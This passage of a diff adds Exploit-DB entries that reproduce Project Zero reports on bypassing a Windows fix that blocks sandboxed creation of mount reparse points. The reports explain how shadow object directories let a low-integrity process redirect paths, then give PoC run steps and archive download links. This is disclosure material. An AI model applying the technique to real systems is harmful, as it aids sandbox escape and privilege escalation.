doesn’t work if the process has a restricted token as NtImpersonateAnonymousToken returns STATUS_ACCESS_DENIED although I believe it would work from AppContainer assuming the device map hadn’t already been created (otherwise not sure the DACL would allow access). + +Proof of Concept: + +I’ve provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or modifying the executable file’s ACL to low. You can compare the operation to the command shell’s mklink tool that will fail to create the mount point at low integrity. The archive password is ‘password’. Follow these steps: + +1) Extract the PoC to a location on a local hard disk which is writable by a normal user. +2) Execute the poc executable file as low integrity passing two arguments, the path to a directory to create (must be somewhere than can be written to as low integrity user such as AppData\Temp\Low) and the arbitrary file path to set the mount point to. For example: +poc.exe c:\users\user\appdata\local\low\abc c:\notreal +3) While the PoC is running you can now list the directory and get access to its contents. + +Expected Result: +It shouldn’t be possible to create a mount point pointed at a location not writable by low integrity user + +Observed Result: +The mount point is created successfully. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39310.zip + diff --git a/platforms/windows/local/39311.txt b/platforms/windows/local/39311.txt new file mode 100755 index 000000000..7e7f08dfb --- /dev/null +++ b/platforms/windows/local/39311.txt @@ -0,0 +1,45 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=573 + +Windows: Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux +Platform: Windows 10, not tested any other OS +Class: Security Feature Bypass + +Summary: +The fix for CVE-2015-2553 can be bypassed to get limited mount reparse points working again for sandbox attacks. + +Description: + +Not sure if this is the only way but you can bypass the fix (which limited ProcessDeviceMap in a sandbox) by instead abusing shadow object directories. NtCreateObjectDirectoryEx takes an additional parameter of a handle to a shadow directory which works similar to the ?? -> GLOBAL?? fallback. If you can create a named object directory (so normal low IL or EPM sandboxes) you can create a dummy directory which shadows GLOBAL??. You can then construct the dos device path using something similar to my last poc by overriding the lookup for C: or GLOBALROOT by dropping an object directory or symlink. If you set the reparse point it will be redirected to an arbitrary location which you control. You can now release the inner object directory or symlink which means the shadow directory version of the name will be found meaning the higher privileged application will pick up the real target. + +For example while setting reparse point you can get: + +\BaseNamedObjects\Dummy\C:\windows -> \Device\NamedPipe\ + +if you now release the C: object directory you get: + +\BaseNamedObjects\Dummy\C:\Windows -> \GLOBAL??\C:\Windows + +This does have a few limitation from the previous attack: + +1. You must be able to create a named object directory, but that's most places outside of a Chrome renderer. +2. The reparse point only works as long as the object directory exists, so probably the lifetime of the attacking process but that's probably okay for a typical privilege escalation. + +Proof of Concept: + +I’ve provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or modifying the executable file’s ACL to low. You can compare the operation to the command shell’s mklink tool that will fail to create the mount point at low integrity. The archive password is ‘password’. Follow these steps: + +1) Extract the PoC to a location on a local hard disk which is writable by a normal user. +2) Execute the poc executable file as low integrity passing two arguments, the path to a directory to create (must be somewhere than can be written to as low integrity user such as AppData\Temp\Low) and the arbitrary file path to set the mount point to. For example: +poc.exe c:\users\user\appdata\local\low\abc c:\notreal +3) While the PoC is running you can now list the directory and get access to its contents. + +Expected Result: +It shouldn’t be possible to create a mount point pointed at a location not writable by low integrity user + +Observed Result: +The mount point is created successfully. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39311.zip +